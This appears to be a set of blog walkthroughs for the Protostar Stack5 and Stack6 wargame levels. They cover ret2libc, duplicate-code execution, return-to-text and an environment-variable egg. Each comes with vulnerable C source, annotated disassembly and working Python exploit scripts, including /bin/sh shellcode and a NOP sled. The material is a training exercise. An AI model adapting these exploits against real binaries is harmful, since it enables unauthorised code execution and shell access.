Binary Exploitation Protostar Stack6 - Walkthrough - Return To Libc

Hello Guyz,



Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Stack6 Level.

In this level, Our goal is to overwrite Return pointer Address And Then Use This Vulnerability To Execute Our Injected Shellcodes. Actually, We just have to prove that with this vulnerability we can exploit this software. but here comes another difficulty of this level. As Already mentioned in hint

Stack6 looks at what happens when you have restrictions on the return address. So, In simple words, we have to exploit this level with another technique.

After Searching About Different Concepts And Techniques. I found some techniques that can bypass this level restrictions easily.

and I will also suggest you to spend few minutes in reading about these techniques.

1. Return To Libc
2. Duplicate Code Execution
3. Return To Text Execution
4. Return To Object Orient Programming

And Try To Apply all these techniques at this level.
By The way, I am going to test it all. So, Check My Blog Index for These Techniques Implementations.

Today, I am going to use Return To Libc. let's Start Our Walkthrough

Return To Libc


According To Wikipedia :

 A "return-to-libc" attack is a computer security attack usually starting with a buffer overflow in which a subroutine return address on a call stack is replaced by an address of a subroutine that is already present in the process’ executable memory, bypassing the NX bit feature (if present) and ridding the attacker of the need to inject their own code.  more


Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here. hahaha! I'm not going to tell all steps clearly. Just Reference.(Use Your Own Brain And Google)
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb

Source


#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();



}


Hint


Stack6 looks at what happens when you have restrictions on the return address.

This level can be done in a couple of ways, 
such as finding the duplicate of the payload (objdump -s) will help with this), or ret2libc, or even return orientated programming.

It is strongly suggested you experiment with multiple ways of getting your code to execute here.

This level is at /opt/protostar/bin/stack6

Disassembly Of Codes


Disassembly :
0x08048484 <getpath+0>: push   ebp
0x08048485 <getpath+1>: mov    ebp,esp
0x08048487 <getpath+3>: sub    esp,0x68                     << ==== Create Buffer Space
0x0804848a <getpath+6>: mov    eax,0x80485d0                << ====  Load Printing Text On EAX
0x0804848f <getpath+11>: mov    DWORD PTR [esp],eax      << ==== Place it at the Top of Stack
0x08048492 <getpath+14>: call   0x80483c0 <printf@plt>   << ==== Call Print Function
0x08048497 <getpath+19>: mov    eax,ds:0x8049720         << ==== Load Value On Eax
0x0804849c <getpath+24>: mov    DWORD PTR [esp],eax      << ==== Place it at the Top Of Stack
0x0804849f <getpath+27>: call   0x80483b0 <fflush@plt>   << ==== Call Flush FUnction
0x080484a4 <getpath+32>: lea    eax,[ebp-0x4c]           << ==== Load Starting Address Of Bufer Variable 
0x080484a7 <getpath+35>: mov    DWORD PTR [esp],eax      << ==== Place it at the Top of Stack
0x080484aa <getpath+38>: call   0x8048380 <gets@plt>     << ==== Call Get Function
0x080484af <getpath+43>: mov    eax,DWORD PTR [ebp+0x4]  << ==== Load Return address Of Current Allocated stack queue Onto EAX
0x080484b2 <getpath+46>: mov    DWORD PTR [ebp-0xc],eax  << ==== Move EAX return address to variable space on stack
0x080484b5 <getpath+49>: mov    eax,DWORD PTR [ebp-0xc]  << ==== Load Return address of current allocated stack queue Onto EAX
0x080484b8 <getpath+52>: and    eax,0xbf000000           << ==== and function 
0x080484bd <getpath+57>: cmp    eax,0xbf000000           << ==== Compare EAX and Value
0x080484c2 <getpath+62>: jne    0x80484e4 <getpath+96>   << ==== Jump WHen Not Equal
0x080484c4 <getpath+64>: mov    eax,0x80485e4            << ==== Load Printable String Starting Address at EAX
0x080484c9 <getpath+69>: mov    edx,DWORD PTR [ebp-0xc]  << ==== Load RETURN address value on Edx
0x080484cc <getpath+72>: mov    DWORD PTR [esp+0x4],edx  << ==== Load EDX value at the top second place of stack
0x080484d0 <getpath+76>: mov    DWORD PTR [esp],eax      << ==== Load Eax value at the top of stack
0x080484d3 <getpath+79>: call   0x80483c0 <printf@plt>   << ==== Call Print Function
0x080484d8 <getpath+84>: mov    DWORD PTR [esp],0x1      << ==== EXit Function Argument
0x080484df <getpath+91>: call   0x80483a0 <_exit@plt>    << ==== Call Exit Function
0x080484e4 <getpath+96>: mov    eax,0x80485f0            << ==== Load Printable String Starting Address at EAX
0x080484e9 <getpath+101>: lea    edx,[ebp-0x4c]           << ==== Load Starting Address Of Bufer Variable 
0x080484ec <getpath+104>: mov    DWORD PTR [esp+0x4],edx  << ==== Load EDX value at the top second place of stack
0x080484f0 <getpath+108>: mov    DWORD PTR [esp],eax      << ==== Load Eax value at the top of stack
0x080484f3 <getpath+111>: call   0x80483c0 <printf@plt>   << ==== Call Print Function
0x080484f8 <getpath+116>: leave                           << ==== Reverse Of (push   ebp; mov    ebp,esp)
0x080484f9 <getpath+117>: ret                             << ==== Return Value

Stack Status


Concept:


 0                  28                                                     104
 =============================================================================
 | Other Stuff      |         Focus Here (Get Will Inject here)             |
==============================================================================

Exploitation Plan

Basically, We are going to overwrite function address with our system call function


 (28+0)                 (28+72)   (28+76)    (28+80)    (28+84)
  ========================================================================================
 | Total Buffer Space (72) |    Pads |    EBP   |    EIP   |   EXIT Call   |  /bin/sh     | 
==========================================================================================

EIP         : Point To System Call (Located On Libc)
EXIT        : System Call Return Pointer Address (But We are again using it as next call From LIbc)
/bin/sh     : Use as Argument For System Call (Located into Libc)

Useful Tools


To find Address Use GDB p command like

(gdb) p system
(gdb) p exit


Or use readelf and grep
# root@protostar:/opt/protostar# readelf -s "/lib/libc-2.11.2.so" | grep "system"
#   238: 000f29d0    66 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
#   606: 00038fb0   125 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
#  1399: 00038fb0   125 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0



#  readelf -s "/lib/libc-2.11.2.so" | grep "exit"
# strings -a -t x "/lib/libc-2.11.2.so" | grep "/bin/sh"

Exploit



#!/usr/bin/python
import struct

# Run This Payload On Custom Environment (/bin/sh)
#
# Exploiting Payload Configurations
#
buff = "A"*72     # buffer Size 
esp = "DDDD"      # Probabily Paddings also
ebp = "BBBB"      # EBP 
eip = "CCCC"      # EIP

# Please Conform Below Addresses
system_call = 0xb7ecffb0    # System Call
exit_call   = 0xb7ec60c0    # Exit Call
binsh_addr  = 0xbfffffa4    # bin/sh



eip = struct.pack("I", system_call)


payload = buff + esp + ebp + eip + struct.pack('I', exit_call) + struct.pack('I', binsh_addr - 0x4)

print payload

Binary Exploitation Protostar Stack6 - Walkthrough - Using Duplicate Code Execution

Hello Guyz,



Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Stack6 Level.


In this level, Our goal is to overwrite Return pointer Address And Then Use This Vulnerability To Execute Our Injected Shellcodes. Actually, We just have to prove that with this vulnerability we can exploit this software. but here comes another difficulty of this level. As Already mentioned in the hint

Stack6 looks at what happens when you have restrictions on the return address. So, In simple words, we have to exploit this level with another technique.

After Searching, Different Concepts And Techniques. I found some techniques that can bypass this level restrictions easily.
and I will also suggest you to spend few minutes in reading about these techniques.

1. Return To Libc
2. Duplicate Code Execution
3. Return To Text Execution
4. Return To Object Orient Programming

And Try To Apply all these techniques at this level.
By The way, I am going to test it all. So, Check My Blog Index for These Techniques Implementations.

Today, I am going to use Duplicate Code Execution. For More Details Use Google and Brain. Now, let's Start Our Walkthrough

Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb

Source


#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

Hint


Stack6 looks at what happens when you have restrictions on the return address.

This level can be done in a couple of ways, 
such as finding the duplicate of the payload (objdump -s) will help with this), or ret2libc, or even return orientated programming.

It is strongly suggested you experiment with multiple ways of getting your code to execute here.

This level is at /opt/protostar/bin/stack6

Disassembly Of Codes


Disassembly:
0x08048484 <getpath+0>: push   ebp
0x08048485 <getpath+1>: mov    ebp,esp
0x08048487 <getpath+3>: sub    esp,0x68
0x0804848a <getpath+6>: mov    eax,0x80485d0
0x0804848f <getpath+11>: mov    DWORD PTR [esp],eax
0x08048492 <getpath+14>: call   0x80483c0 <printf@plt>
0x08048497 <getpath+19>: mov    eax,ds:0x8049720
0x0804849c <getpath+24>: mov    DWORD PTR [esp],eax
0x0804849f <getpath+27>: call   0x80483b0 <fflush@plt>
0x080484a4 <getpath+32>: lea    eax,[ebp-0x4c]
0x080484a7 <getpath+35>: mov    DWORD PTR [esp],eax
0x080484aa <getpath+38>: call   0x8048380 <gets@plt>
0x080484af <getpath+43>: mov    eax,DWORD PTR [ebp+0x4]
0x080484b2 <getpath+46>: mov    DWORD PTR [ebp-0xc],eax
0x080484b5 <getpath+49>: mov    eax,DWORD PTR [ebp-0xc]
0x080484b8 <getpath+52>: and    eax,0xbf000000
0x080484bd <getpath+57>: cmp    eax,0xbf000000
0x080484c2 <getpath+62>: jne    0x80484e4 <getpath+96>
0x080484c4 <getpath+64>: mov    eax,0x80485e4
0x080484c9 <getpath+69>: mov    edx,DWORD PTR [ebp-0xc]
0x080484cc <getpath+72>: mov    DWORD PTR [esp+0x4],edx
0x080484d0 <getpath+76>: mov    DWORD PTR [esp],eax
0x080484d3 <getpath+79>: call   0x80483c0 <printf@plt>
0x080484d8 <getpath+84>: mov    DWORD PTR [esp],0x1
0x080484df <getpath+91>: call   0x80483a0 <_exit@plt>
0x080484e4 <getpath+96>: mov    eax,0x80485f0
0x080484e9 <getpath+101>: lea    edx,[ebp-0x4c]
0x080484ec <getpath+104>: mov    DWORD PTR [esp+0x4],edx
0x080484f0 <getpath+108>: mov    DWORD PTR [esp],eax
0x080484f3 <getpath+111>: call   0x80483c0 <printf@plt>
0x080484f8 <getpath+116>: leave  
0x080484f9 <getpath+117>: ret 

Useful Tools And Idea

Because We can't use the stack to execute because of restrictions. so, we will use memory address of inserted data. .. Well,


~:# ulimit -c unlimited

and Crash App with Overflow.

Use objdump -s "core.crash.file"

Exploit


#!/usr/bin/python

import struct

daddr = 0xb7fde000 + 0x10

buff = len("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB")


#shellcode = "\x90"*10+'\xcc'
shellcode = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*8



eip = struct.pack("I", daddr)  


shell = '\x90'*(buff-len(shellcode))+shellcode
#print len(shell)
payload =  shell + eip

print payload

Binary Exploitation Protostar Stack6 - Walkthrough - Using Return To Text Execution

Hello Guyz,



Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Stack6 Level.

In this level, Our goal is to overwrite Return pointer Address And Then Use This Vulnerability To Execute Our Injected Shellcodes. Actually, We just have to prove that with this vulnerability we can exploit this software. but here comes another difficulty of this level. As Already mentioned in hint

Stack6 looks at what happens when you have restrictions on the return address. So, In simple words, we have to exploit this level with another technique.

After Searching, Different Concepts And Techniques. I found some techniques that can bypass this level restrictions easily.

and I will also suggest you to spend few minutes in reading about these techniques.

1. Return To Libc
2. Duplicate Code Execution
3. Return To Text Execution
4. Return To Object Orient Programming

And Try To Apply all these techniques at this level.
By The way, I am going to test it all. So, Check My Blog Index for These Techniques Implementations.

Today, I am going to use Return to Text Execution. For More Details Use Google and Brain. Now, let's Start Our Walkthrough

Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb

Source


#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

Hint



Stack6 looks at what happens when you have restrictions on the return address.

This level can be done in a couple of ways, 
such as finding the duplicate of the payload (objdump -s) will help with this), or ret2libc, or even return orientated programming.

It is strongly suggested you experiment with multiple ways of getting your code to execute here.

This level is at /opt/protostar/bin/stack6

Disassembly Of Codes


Disassembly:
0x08048484 <getpath+0>: push   ebp
0x08048485 <getpath+1>: mov    ebp,esp
0x08048487 <getpath+3>: sub    esp,0x68
0x0804848a <getpath+6>: mov    eax,0x80485d0
0x0804848f <getpath+11>: mov    DWORD PTR [esp],eax
0x08048492 <getpath+14>: call   0x80483c0 <printf@plt>
0x08048497 <getpath+19>: mov    eax,ds:0x8049720
0x0804849c <getpath+24>: mov    DWORD PTR [esp],eax
0x0804849f <getpath+27>: call   0x80483b0 <fflush@plt>
0x080484a4 <getpath+32>: lea    eax,[ebp-0x4c]
0x080484a7 <getpath+35>: mov    DWORD PTR [esp],eax
0x080484aa <getpath+38>: call   0x8048380 <gets@plt>
0x080484af <getpath+43>: mov    eax,DWORD PTR [ebp+0x4]
0x080484b2 <getpath+46>: mov    DWORD PTR [ebp-0xc],eax
0x080484b5 <getpath+49>: mov    eax,DWORD PTR [ebp-0xc]
0x080484b8 <getpath+52>: and    eax,0xbf000000
0x080484bd <getpath+57>: cmp    eax,0xbf000000
0x080484c2 <getpath+62>: jne    0x80484e4 <getpath+96>
0x080484c4 <getpath+64>: mov    eax,0x80485e4
0x080484c9 <getpath+69>: mov    edx,DWORD PTR [ebp-0xc]
0x080484cc <getpath+72>: mov    DWORD PTR [esp+0x4],edx
0x080484d0 <getpath+76>: mov    DWORD PTR [esp],eax
0x080484d3 <getpath+79>: call   0x80483c0 <printf@plt>
0x080484d8 <getpath+84>: mov    DWORD PTR [esp],0x1
0x080484df <getpath+91>: call   0x80483a0 <_exit@plt>
0x080484e4 <getpath+96>: mov    eax,0x80485f0
0x080484e9 <getpath+101>: lea    edx,[ebp-0x4c]
0x080484ec <getpath+104>: mov    DWORD PTR [esp+0x4],edx
0x080484f0 <getpath+108>: mov    DWORD PTR [esp],eax
0x080484f3 <getpath+111>: call   0x80483c0 <printf@plt>
0x080484f8 <getpath+116>: leave  
0x080484f9 <getpath+117>: ret 

Exploit



#!/usr/bin/python
import struct


buf = "a"*80

eip = struct.pack("I",0x080484f9) # Get Path Ret Call address

neip = struct.pack("I",0xbffffce4) # Address To Our Shellcode

# ------------------------------------------------------------------------
# | 'A'*80 | [CurrentFunctionRETInstruction] | PointToStack | Shellcode | 
# ------------------------------------------------------------------------
# After RET Function Code, Machine Will Check For NExt Instruction
# Actually Above RET is Just Point To Instruction and as me know, 
# process always save next instruction as NEW EIP
#
print buf+eip + neip + '\xcc'*40

Binary Exploitation Protostar Stack6 - Walkthrough - Using EGG Shell Method

Hello Guyz,



Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Stack6 Level.
In this level, Our goal is to overwrite Return pointer Address And Then Use This Vulnerability To Execute Our Injected Shellcodes. Actually, We just have to prove that with this vulnerability we can exploit this software. but here comes another difficulty of this level. As Already mentioned in hint Stack6 looks at what happens when you have restrictions on the return address. So, In simple words, we have to exploit this level with another technique.

After Searching About Different Concepts And Techniques. I found some techniques that can bypass this level restrictions easily.
and I will also suggest you to spend few minutes in reading about these techniques.

1. Return To Libc
2. Duplicate Code Execution
3. Return To Text Execution
4. Return To Object Orient Programming

And Try To Apply all these techniques at this level.
By The way, I am going to test it all. So, Check My Blog Index for These Techniques Implementations.

Today, I am going to use Return To Libc With EGG Shell. Check Blog Index If You Want To Read ReturnToLibc Without EGG shell In Stack6. let's Start Our Walkthrough

Return To Libc


According To Wikipedia :

 A "return-to-libc" attack is a computer security attack usually starting with a buffer overflow in which a subroutine return address on a call stack is replaced by an address of a subroutine that is already present in the process’ executable memory, bypassing the NX bit feature (if present) and ridding the attacker of the need to inject their own code.  more


Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here. hahaha! I'm not going to tell all steps clearly. Just Reference.(Use Your Own Brain And Google)
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb

Source


#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();



}


Hint


Stack6 looks at what happens when you have restrictions on the return address.

This level can be done in a couple of ways, 
such as finding the duplicate of the payload (objdump -s) will help with this), or ret2libc, or even return orientated programming.

It is strongly suggested you experiment with multiple ways of getting your code to execute here.

This level is at /opt/protostar/bin/stack6

Disassembly Of Codes


Disassembly :
0x08048484 <getpath+0>: push   ebp
0x08048485 <getpath+1>: mov    ebp,esp
0x08048487 <getpath+3>: sub    esp,0x68                     << ==== Create Buffer Space
0x0804848a <getpath+6>: mov    eax,0x80485d0                << ====  Load Printing Text On EAX
0x0804848f <getpath+11>: mov    DWORD PTR [esp],eax      << ==== Place it at the Top of Stack
0x08048492 <getpath+14>: call   0x80483c0 <printf@plt>   << ==== Call Print Function
0x08048497 <getpath+19>: mov    eax,ds:0x8049720         << ==== Load Value On Eax
0x0804849c <getpath+24>: mov    DWORD PTR [esp],eax      << ==== Place it at the Top Of Stack
0x0804849f <getpath+27>: call   0x80483b0 <fflush@plt>   << ==== Call Flush FUnction
0x080484a4 <getpath+32>: lea    eax,[ebp-0x4c]           << ==== Load Starting Address Of Bufer Variable 
0x080484a7 <getpath+35>: mov    DWORD PTR [esp],eax      << ==== Place it at the Top of Stack
0x080484aa <getpath+38>: call   0x8048380 <gets@plt>     << ==== Call Get Function
0x080484af <getpath+43>: mov    eax,DWORD PTR [ebp+0x4]  << ==== Load Return address Of Current Allocated stack queue Onto EAX
0x080484b2 <getpath+46>: mov    DWORD PTR [ebp-0xc],eax  << ==== Move EAX return address to variable space on stack
0x080484b5 <getpath+49>: mov    eax,DWORD PTR [ebp-0xc]  << ==== Load Return address of current allocated stack queue Onto EAX
0x080484b8 <getpath+52>: and    eax,0xbf000000           << ==== and function 
0x080484bd <getpath+57>: cmp    eax,0xbf000000           << ==== Compare EAX and Value
0x080484c2 <getpath+62>: jne    0x80484e4 <getpath+96>   << ==== Jump WHen Not Equal
0x080484c4 <getpath+64>: mov    eax,0x80485e4            << ==== Load Printable String Starting Address at EAX
0x080484c9 <getpath+69>: mov    edx,DWORD PTR [ebp-0xc]  << ==== Load RETURN address value on Edx
0x080484cc <getpath+72>: mov    DWORD PTR [esp+0x4],edx  << ==== Load EDX value at the top second place of stack
0x080484d0 <getpath+76>: mov    DWORD PTR [esp],eax      << ==== Load Eax value at the top of stack
0x080484d3 <getpath+79>: call   0x80483c0 <printf@plt>   << ==== Call Print Function
0x080484d8 <getpath+84>: mov    DWORD PTR [esp],0x1      << ==== EXit Function Argument
0x080484df <getpath+91>: call   0x80483a0 <_exit@plt>    << ==== Call Exit Function
0x080484e4 <getpath+96>: mov    eax,0x80485f0            << ==== Load Printable String Starting Address at EAX
0x080484e9 <getpath+101>: lea    edx,[ebp-0x4c]           << ==== Load Starting Address Of Bufer Variable 
0x080484ec <getpath+104>: mov    DWORD PTR [esp+0x4],edx  << ==== Load EDX value at the top second place of stack
0x080484f0 <getpath+108>: mov    DWORD PTR [esp],eax      << ==== Load Eax value at the top of stack
0x080484f3 <getpath+111>: call   0x80483c0 <printf@plt>   << ==== Call Print Function
0x080484f8 <getpath+116>: leave                           << ==== Reverse Of (push   ebp; mov    ebp,esp)
0x080484f9 <getpath+117>: ret                             << ==== Return Value

Stack Status


Concept:


 0                  28                                                     104
 =============================================================================
 | Other Stuff      |         Focus Here (Get Will Inject here)             |
==============================================================================

Exploitation Plan

Basically, We are going to overwrite function address with our system call function


 (28+0)                 (28+72)   (28+76)    (28+80)    (28+84)
  ========================================================================================
 | Total Buffer Space (72) |    Pads |    EBP   |    EIP   |   EXIT Call   |  /bin/sh     | 
==========================================================================================

EIP         : Point To System Call (Located On Libc)
EXIT        : System Call Return Pointer Address (But We are again using it as next call From LIbc)
/bin/sh     : Use as Argument For System Call (Custom Environment)

Useful Tools


To find Address Use GDB p command like

(gdb) p system
(gdb) p exit


Or use readelf and grep
# root@protostar:/opt/protostar# readelf -s "/lib/libc-2.11.2.so" | grep "system"
#   238: 000f29d0    66 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
#   606: 00038fb0   125 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
#  1399: 00038fb0   125 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0



#  readelf -s "/lib/libc-2.11.2.so" | grep "exit"
# strings -a -t x "/lib/libc-2.11.2.so" | grep "/bin/sh"

C Eggshell environment


// Create A Dummy Variable On Environment and Get Address Of it

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>



int main(int argc, char **argv)
 {
  char *ptr = getenv("EGG");
  if (ptr != NULL)
   {
   printf("Estimated address: %p\n", ptr);
   return 0;
  }
  printf("Setting up environment...\nRun Again This Scrit Under This Environmet To Get Address\n");
  setenv("EGG", "/bin/sh", 1);
  execl("/bin/sh", (char *)NULL);
}

Exploit



#!/usr/bin/python
import struct

# Run This Payload On Custom Environment (/bin/sh)
#
# Exploiting Payload Configurations
#
buff = "A"*72     # buffer Size 
esp = "DDDD"      # Probabily Paddings also
ebp = "BBBB"      # EBP 
eip = "CCCC"      # EIP

# Please Conform Below Addresses
system_call = 0xb7ecffb0    # System Call
exit_call   = 0xb7ec60c0    # Exit Call
binsh_addr  = 0xbfffffa4    # bin/sh



eip = struct.pack("I", system_call)


payload = buff + esp + ebp + eip + struct.pack('I', exit_call) + struct.pack('I', binsh_addr - 0x4)

print payload

Binary Exploitation Protostar Stack5 - Walkthrough

Hello Guyz,



Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Stack5 Level.
In this level, Our goal is to overwrite Return pointer Address Onto The Stack, So that Instead Of Returning To Main libc function, EIP (Instruction Pointer) will Point To Our Injected Shellcode. Actually Here, At this level, We just need to demonstrate that how we can use return pointer overwrite vulnerability to execute our Injected Shellcode Or Any Opcode.
Here, Opcode refers to Machine Operation Codes.

Shellcode :

Basically, Shellcodes is just a word to represent any small piece of Machine Operation Codes That can open a shell. In Other Words, It refers to the piece of Machine Operation Codes that can do any specific task.

For More Information, I will suggest you to Use Google.


Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++, Shellcodes, Intel Syntax and Gdb

Source Codes

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}


Hint

Stack5 is a standard buffer overflow, this time introducing shellcode.

This level is at /opt/protostar/bin/stack5

Hints

At this point in time, it might be easier to use someone elses shellcode
If debugging the shellcode, use \xcc (int3) to stop the program executing and return to the debugger
remove the int3s once your shellcode is done.

Disassembly Of Code

(gdb) disass main
Dump of assembler code for function main:
0x080483c4 <main+0>:    push   %ebp
0x080483c5 <main+1>:    mov    %esp,%ebp
0x080483c7 <main+3>:    and    $0xfffffff0,%esp
0x080483ca <main+6>:    sub    $0x50,%esp   < ============ Creating Space ONto stack
0x080483cd <main+9>:    lea    0x10(%esp),%eax  < ======== Starting Point to Insert Values Into Create Space Buffer
0x080483d1 <main+13>:   mov    %eax,(%esp)      < ======== Load Argument
0x080483d4 <main+16>:   call   0x80482e8 <gets@plt> <===== Call Function
0x080483d9 <main+21>:   leave
0x080483da <main+22>:   ret
End of assembler dump.

Stack Status

0           16                                                    80         88    92    96             156
 ==========================================================================================================================
 Starting > |                   "A" * 64                          | Paddings | EBP | EIP |  NOPS * 60   |   Shellcode  |  
 ==========================================================================================================================
                                                                                      |_________________________^

Registers Info ( Breakpoint main+22 )

(gdb) info registers
eax            0xbffffc70       -1073742736
ecx            0xbffffc70       -1073742736
edx            0xb7fd9334       -1208118476
ebx            0xb7fd7ff4       -1208123404
esp            0xbffffcbc       0xbffffcbc
ebp            0x42424242       0x42424242
esi            0x0      0
edi            0x0      0
eip            0x80483da        0x80483da <main+22>
eflags         0x200246 [ PF ZF IF ID ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51

Stack Info  ( Breakpoint main+22 )

(gdb) x/100x $esp
0xbffffcbc:     0xbffffcc0      0x90909090      0x90909090      0x90909090
0xbffffccc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffcdc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffcec:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffcfc:     0x315e1aeb      0x074688c0      0x5e891e8d      0x0c468908
0xbffffd0c:     0xf3890bb0      0x8d084e8d      0x80cd0c56      0xffffe1e8
0xbffffd1c:     0x69622fff      0x68732f6e      0xb7ff6200      0xb7eadb9b
0xbffffd2c:     0xb7ffeff4      0x00000001      0x08048310      0x00000000
0xbffffd3c:     0x08048331      0x080483c4      0x00000001      0xbffffd64
0xbffffd4c:     0x080483f0      0x080483e0      0xb7ff1040      0xbffffd5c
0xbffffd5c:     0xb7fff8f8      0x00000001      0xbffffe77      0x00000000
0xbffffd6c:     0xbffffe91      0xbffffea1      0xbffffeac      0xbffffece
0xbffffd7c:     0xbffffee1      0xbffffeeb      0xbffffef6      0xbfffff38
0xbffffd8c:     0xbfffff4c      0xbfffff5b      0xbfffff72      0xbfffff83
0xbffffd9c:     0xbfffff8c      0xbfffff97      0xbfffff9f      0xbfffffac
0xbffffdac:     0x00000000      0x00000020      0xb7fe2414      0x00000021
0xbffffdbc:     0xb7fe2000      0x00000010      0x0febfbff      0x00000006
0xbffffdcc:     0x00001000      0x00000011      0x00000064      0x00000003
0xbffffddc:     0x08048034      0x00000004      0x00000020      0x00000005
0xbffffdec:     0x00000007      0x00000007      0xb7fe3000      0x00000008
0xbffffdfc:     0x00000000      0x00000009      0x08048310      0x0000000b
0xbffffe0c:     0x00000000      0x0000000c      0x00000000      0x0000000d
0xbffffe1c:     0x00000000      0x0000000e      0x00000000      0x00000017
0xbffffe2c:     0x00000000      0x00000019      0xbffffe5b      0x0000001f
0xbffffe3c:     0xbfffffe2      0x0000000f      0xbffffe6b      0x00000000

Our Mission

I hope, From Above Hints And Details you Already got some light on my the game plan. But If Not! Don't Worry. Let Me Explain you in more simple words.

Here, In This Level As You Already Seen In Above Gdb Disassembly Output. Main Function Is Using gets function to take Inputs from User without verifying the size of the input. Initialising Value In Buffer. So, We Just need To Overflow That Buffer Variable With Our Input So, That We can overwrite Return Function.
Now, Second Question Comes In Our Mind. What we can do after this. Well, Friends Here Comes Juicy concept. We are going to insert some Opcode (Machine Operation codes) In Our Input And Then we going to use Return Pointer To Point To Our Shellcode. So That After Execution Of the main program, Because of overwritten Pointer, CPU will Execute Our Shellcode. Boom! We conquer This level.

Some Important Keypoints To Remember.

We Can use \x90 Opcode In Starting With Shellcode. Why? Because \x90 is a NOP Opcode (No Operation Machine Code). Basically, When CPU registers counter this code. they, Just Ignore it and Move to another address. Hence, We can use 20-50 NOP To make our shellcode address more accurate.


\xcc (int3) to stop the program executing

\xcc is another important Opcode. it's A Trap Command. In simple words, Whenever CPU registers receive the \xcc code. They Just Stop All Process, Through Trap Error And Terminate Execution.
So, We can use This opcode to verify in place of shellcode that CPU is successfully executing our Pointed shellcode address Or Not.

Exploit


#!/usr/bin/python

import struct

# Insert Your Shellcode Here
shellcode = "\xcc"*40



eip = '\xc0\xfc\xff\xbf' # EIP 0xbffffcc0
tbis = "A"*64            # Buffer
pads = 'B'*12            # Paddings
payload = tbis + pads+ eip + '\x90'*60 + shellcode
print payload